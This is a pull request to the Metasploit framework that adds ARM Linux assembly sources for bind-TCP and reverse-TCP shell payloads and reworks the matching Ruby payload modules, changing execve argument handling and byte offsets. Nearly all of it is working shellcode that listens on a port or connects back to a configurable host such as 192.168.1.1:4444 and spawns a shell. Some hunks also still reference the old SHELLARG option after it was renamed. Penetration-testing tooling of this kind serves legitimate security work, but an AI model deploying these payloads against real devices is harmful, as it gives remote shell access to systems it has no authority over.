### PR TITLE
work on linux/armle shellcodes, add source files

### DIFF
--- a/external/source/shellcode/linux/armle/single_sock_bind.s
+++ b/external/source/shellcode/linux/armle/single_sock_bind.s
@@ -73,7 +73,7 @@ loop:
        subs    r1, r1, #1 
        bpl     loop
 
-@ execve(SHELL, [SHELLARG], [NULL])
+@ execve(SHELL, [ARGV0], [NULL])
        add     r0, pc, #36
        eor     r4, r4, r4
        push    {r4}
@@ -95,7 +95,7 @@ loop:
 .word 0x00000000
 .word 0x00000000
 .word 0x00000000
-@ SHELLARG
+@ ARGV0
 .word 0x00000000 @ the args!
 .word 0x00000000
 .word 0x00000000

--- a/external/source/shellcode/linux/armle/single_sock_bind.s
+++ b/external/source/shellcode/linux/armle/single_sock_bind.s
@@ -1,0 +1,102 @@
+@@
+@
+@        Name: single_sock_bind
+@   Qualities: -
+@     Authors: civ, repmovsb
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux bind TCP shellcode for ARM LE architecture.
+@
+@        This source is built from the payload module (instead of other way around...)
+@
+@        Assemble with: as single_sock_bind.s -o single_sock_bind.o
+@        Link with:     ld single_sock_bind.o -o single_sock_bind
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Bind TCP
+@ meta-description=Listen on a port for a connection and run a second stage
+@ meta-authors=civ, repmovsb
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=singles
+@ meta-connection-type=bind
+@ meta-name=bind_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+@ socket(2,1,6)
+       mov     r0, #2
+       mov     r1, #1
+       mov     r2, #6
+       mov     r7, #1
+       lsl     r7, r7, #8
+       add     r7, r7, #25
+       svc     0
+       mov     r6, r0
+
+@ bind
+       add     r1, pc, #128
+       mov     r2, #16
+       mov     r7, #1
+       lsl     r7, r7, #8
+       add     r7, r7, #26
+       svc     0
+
+@ listen
+       mov     r0, r6
+       mov     r7, #1
+       lsl     r7, r7, #8
+       add     r7, r7, #28
+       svc     0
+
+@ accept
+       mov     r0, r6
+       sub     r1, r1, r1
+       sub     r2, r2, r2
+       mov     r7, #1
+       lsl     r7, r7, #8
+       add     r7, r7, #29
+       svc     0
+
+@ dup
+       mov     r6, r0
+       mov     r1, #2
+loop:
+       mov     r0, r6
+       mov     r7, #63
+       svc     0
+       subs    r1, r1, #1 
+       bpl     loop
+
+@ execve(SHELL, [SHELLARG], [NULL])
+       add     r0, pc, #36
+       eor     r4, r4, r4
+       push    {r4}
+       mov     r2, sp
+       add     r4, pc, #36
+       push    {r4}
+       mov     r1, sp
+       mov     r7, #11
+       svc     0
+
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002
+@ ip: 0.0.0.0
+.word   0x00000000
+
+@ SHELL
+.word 0x00000000 @ the shell goes here!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+@ SHELLARG
+.word 0x00000000 @ the args!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000

--- a/external/source/shellcode/linux/armle/single_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/single_sock_reverse.s
@@ -2,7 +2,7 @@
 @
 @        Name: single_sock_reverse
 @   Qualities: -
-@     Authors: civ, Mark Schloesser
+@     Authors: civ, repmovsb
 @     License: MSF_LICENSE
 @ Description:
 @
@@ -17,7 +17,7 @@
 @
 @ meta-shortname=Linux Reverse TCP
 @ meta-description=Connect back to the framework and run a second stage
-@ meta-authors=civ, Mark Schloesser
+@ meta-authors=civ, repmovsb
 @ meta-os=linux
 @ meta-arch=armle
 @ meta-category=singles

--- a/external/source/shellcode/linux/armle/single_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/single_sock_reverse.s
@@ -63,7 +63,7 @@ _start:
        mov     r7, #63
        svc     0
 
-@ execve(SHELL, [SHELLARG], [NULL])
+@ execve(SHELL, [ARGV0], [NULL])
        add     r0, pc, #36
        eor     r4, r4, r4
        push    {r4}
@@ -86,7 +86,7 @@ _start:
 .word 0x00000000
 .word 0x00000000
 .word 0x00000000
-@ SHELLARG
+@ ARGV0
 .word 0x00000000 @ the args!
 .word 0x00000000
 .word 0x00000000

--- a/external/source/shellcode/linux/armle/single_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/single_sock_reverse.s
@@ -1,0 +1,93 @@
+@@
+@
+@        Name: single_sock_reverse
+@   Qualities: -
+@     Authors: civ, Mark Schloesser
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux reverse TCP shellcode for ARM LE architecture.
+@
+@        This source is built from the payload module (instead of other way around...)
+@
+@        Assemble with: as single_sock_reverse.s -o single_sock_reverse.o
+@        Link with:     ld single_sock_reverse.o -o single_sock_reverse
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Reverse TCP
+@ meta-description=Connect back to the framework and run a second stage
+@ meta-authors=civ, Mark Schloesser
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=singles
+@ meta-connection-type=reverse
+@ meta-name=reverse_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+@ socket(2,1,6)
+       mov     r0, #2
+       mov     r1, #1
+       add     r2, r1, #5
+       mov     r7, #140
+       add     r7, r7, #141
+       svc     0
+
+@ connect(soc, socaddr, 0x10)
+       mov     r6, r0
+       add     r1, pc, #96
+       mov     r2, #16
+       mov     r7, #141
+       add     r7, r7, #142
+       svc     0
+
+@ dup2(soc,0) @stdin
+       mov     r0, r6
+       mov     r1, #0
+       mov     r7, #63
+       svc     0
+
+@ dup2(soc,1) @stdout
+       mov     r0, r6
+       mov     r1, #1
+       mov     r7, #63
+       svc     0
+
+@ dup2(soc,2) @stderr
+       mov     r0, r6
+       mov     r1, #2
+       mov     r7, #63
+       svc     0
+
+@ execve(SHELL, [SHELLARG], [NULL])
+       add     r0, pc, #36
+       eor     r4, r4, r4
+       push    {r4}
+       mov     r2, sp
+       add     r4, pc, #36
+       push    {r4}
+       mov     r1, sp
+       mov     r7, #11
+       svc     0
+
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002
+@ ip: 192.168.1.1
+.word   0x0101a8c0
+@.word   0x0100007f
+
+@ SHELL
+.word 0x00000000 @ the shell goes here!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+@ SHELLARG
+.word 0x00000000 @ the args!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000

--- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
@@ -112,7 +112,7 @@ module Metasploit3
     register_options(
       [
         OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
-        OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
+        OptString.new('ARGV0', [ false, "argv[0] to pass to execve", "sh" ]) # mostly used for busybox
       ], self.class)
   end
 
@@ -128,7 +128,7 @@ module Metasploit3
     arg = datastore['SHELLARG']
     if arg
       if arg.length >= 16
-        raise ArgumentError, "The specified shell argument must be less than 16 bytes."
+        raise ArgumentError, "The specified argv[0] must be less than 16 bytes."
       end
       p[192, arg.length] = arg
     end

--- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
@@ -29,8 +29,8 @@ module Metasploit3
         {
           'Offsets' =>
             {
-              'RHOST'    => [ 208, 'ADDR' ],
-              'LPORT'    => [ 206, 'n' ],
+              'RHOST'    => [ 172, 'ADDR' ],
+              'LPORT'    => [ 170, 'n' ],
             },
           'Payload' =>
             [
@@ -45,7 +45,7 @@ module Metasploit3
               0xe1a06000, # mov     r6, r0
 
               # bind
-              0xe28f10A4, # 1dr     r1, pc, #172  ; 0x9C
+              0xe28f1080, # 1dr     r1, pc, #128
               0xe3a02010, # mov     r2, #16
               0xe3a07001, # mov     r7, #1
               0xe1a07407, # lsl     r7, r7, #8
@@ -78,25 +78,14 @@ module Metasploit3
               0x5afffffa, # bpl     8c <.text+0x8c>
 
               # execve("/system/bin/sh", args, env)
-              0xe28f0048, # add     r0, pc, #72     ; 0xe40
+              0xe28f0024, # add     r0, pc, #36     ; 0x24
               0xe0244004, # eor     r4, r4, r4
               0xe92d0010, # push    {r4}
               0xe1a0200d, # mov     r2, sp
-              0xe92d0004, # push    {r2}
-              0xe1a0200d, # mov     r2, sp
+              0xe28f4024, # add     r4, pc, #36     ; 0x10
               0xe92d0010, # push    {r4}
-              0xe59f1048, # ldr     r1, [pc, #72]   ; 8124 <env+0xe8>
-              0xe92d0002, # push    {r1}
-              0xe92d2000, # push    {sp}
               0xe1a0100d, # mov     r1, sp
-              0xe92d0004, # push    {r2}
-              0xe1a0200d, # mov     r2, sp
-              0xe3a0700b, # mov     r7, #11 ; 0xeb
-              0xef000000, # svc     0x00000000
-
-              # exit(0)
-              0xe3a00000, # mov     r0, #0  ; 0x0
-              0xe3a07001, # mov     r7, #1  ; 0x1
+              0xe3a0700b, # mov     r7, #11 ; 0xb
               0xef000000, # svc     0x00000000
 
               # <af>:
@@ -110,7 +99,10 @@ module Metasploit3
               0x00000000, # .word   0x00000000
 
               # <arg>:
-              0x00000000  # .word   0x00000000 ; the args!
+              0x00000000, # .word   0x00000000 ; the args!
+              0x00000000, # .word   0x00000000
+              0x00000000, # .word   0x00000000
+              0x00000000, # .word   0x00000000
 
             ].pack("V*")
         }
@@ -131,14 +123,14 @@ module Metasploit3
     if sh.length >= 16
       raise ArgumentError, "The specified shell must be less than 16 bytes."
     end
-    p[212, sh.length] = sh
+    p[176, sh.length] = sh
 
     arg = datastore['SHELLARG']
     if arg
-      if arg.length >= 4
-        raise ArgumentError, "The specified shell argument must be less than 4 bytes."
+      if arg.length >= 16
+        raise ArgumentError, "The specified shell argument must be less than 16 bytes."
       end
-      p[228, arg.length] = arg
+      p[192, arg.length] = arg
     end
 
     p

--- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
@@ -112,7 +112,7 @@ module Metasploit3
     register_options(
       [
         OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
-        OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
+        OptString.new('ARGV0', [ false, "argv[0] to pass to execve", "sh" ]) # mostly used for busybox
       ], self.class)
   end
 
@@ -125,10 +125,10 @@ module Metasploit3
     end
     p[140, sh.length] = sh
 
-    arg = datastore['SHELLARG']
+    arg = datastore['ARGV0']
     if arg
       if arg.length >= 16
-        raise ArgumentError, "The specified shell argument must be less than 16 bytes."
+        raise ArgumentError, "The specified argv[0] must be less than 16 bytes."
       end
       p[156, arg.length] = arg
     end

--- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
@@ -28,8 +28,8 @@ module Metasploit3
         {
           'Offsets' =>
             {
-              'LHOST'    => [ 172, 'ADDR' ],
-              'LPORT'    => [ 170, 'n' ],
+              'LHOST'    => [ 136, 'ADDR' ],
+              'LPORT'    => [ 134, 'n' ],
             },
           'Payload' =>
             [
@@ -54,7 +54,7 @@ module Metasploit3
 
               # connect(soc, socaddr, 0x10)
               0xe1a06000,       # mov     r6, r0
-              0xe28f1084,       # 1dr     r1, pc, #132  ; 0x84
+              0xe28f1060,       # 1dr     r1, pc, #96  ; 0x60
               0xe3a02010,       # mov     r2, #16 ; 0x10
               0xe3a0708d,       # mov     r7, #141        ; 0x8d
               0xe287708e,       # add     r7, r7, #142    ; 0x8e
@@ -79,30 +79,18 @@ module Metasploit3
               0xef000000,       # svc     0x00000000
 
               # execve("/system/bin/sh", args, env)
-              # Shrink me here. I am lame.
-              0xe28f0048,       # add     r0, pc, #72     ; 0x48
+              0xe28f0024,       # add     r0, pc, #36     ; 0x24
               0xe0244004,       # eor     r4, r4, r4
               0xe92d0010,       # push    {r4}
               0xe1a0200d,       # mov     r2, sp
-              0xe92d0004,       # push    {r2}
-              0xe1a0200d,       # mov     r2, sp
+              0xe28f4024,       # add     r4, pc, #36     ; 0x10
               0xe92d0010,       # push    {r4}
-              0xe59f1048,       # ldr     r1, [pc, #72]   ; 8124 <env+0x8>
-              0xe92d0002,       # push    {r1}
-              0xe92d2000,       # push    {sp}
               0xe1a0100d,       # mov     r1, sp
-              0xe92d0004,       # push    {r2}
-              0xe1a0200d,       # mov     r2, sp
               0xe3a0700b,       # mov     r7, #11 ; 0xb
               0xef000000,       # svc     0x00000000
 
-              # exit(0)
-              0xe3a00000,       # mov     r0, #0  ; 0x0
-              0xe3a07001,       # mov     r7, #1  ; 0x1
-              0xef000000,       # svc     0x00000000
-
               # <af>:
-              # port offset = 170, ip offset = 172
+              # port offset = 134, ip offset = 136
               0x04290002,       # .word   0x5c110002 @ port: 4444 , sin_fam = 2
               0x0101a8c0,       # .word   0x0101a8c0 @ ip: 192.168.1.1
               # <shell>:
@@ -111,7 +99,10 @@ module Metasploit3
               0x00000000,       # .word   0x00000000
               0x00000000,       # .word   0x00000000
               # <arg>:
-              0x00000000        # .word   0x00000000 ; the args!
+              0x00000000,       # .word   0x00000000 ; the args!
+              0x00000000,       # .word   0x00000000
+              0x00000000,       # .word   0x00000000
+              0x00000000,       # .word   0x00000000
 
             ].pack("V*")
         }
@@ -132,14 +123,14 @@ module Metasploit3
     if sh.length >= 16
       raise ArgumentError, "The specified shell must be less than 16 bytes."
     end
-    p[176, sh.length] = sh
+    p[140, sh.length] = sh
 
     arg = datastore['SHELLARG']
     if arg
-      if arg.length >= 4
-        raise ArgumentError, "The specified shell argument must be less than 4 bytes."
+      if arg.length >= 16
+        raise ArgumentError, "The specified shell argument must be less than 16 bytes."
       end
-      p[192, arg.length] = arg
+      p[156, arg.length] = arg
     end
 
     p


### PR DESCRIPTION
Ran into an issue with executing a busybox shell that needs "/bin/sh" in argv[0] to work properly (busybox applet). While looking at the payload module I figured that it currently have the SHELLARG in argv[0] and SHELLARG is limited to 4 bytes (moves through a register).

I reduced the execve part a bit in size (simplified), made a bit more room for SHELLARG, and added the respective source files so that testing is easier.

I did not verify so far whether these still work on the systems they were originally tested on - but they work on the ARM device I'm playing with. The changes are fairly straightforward though.
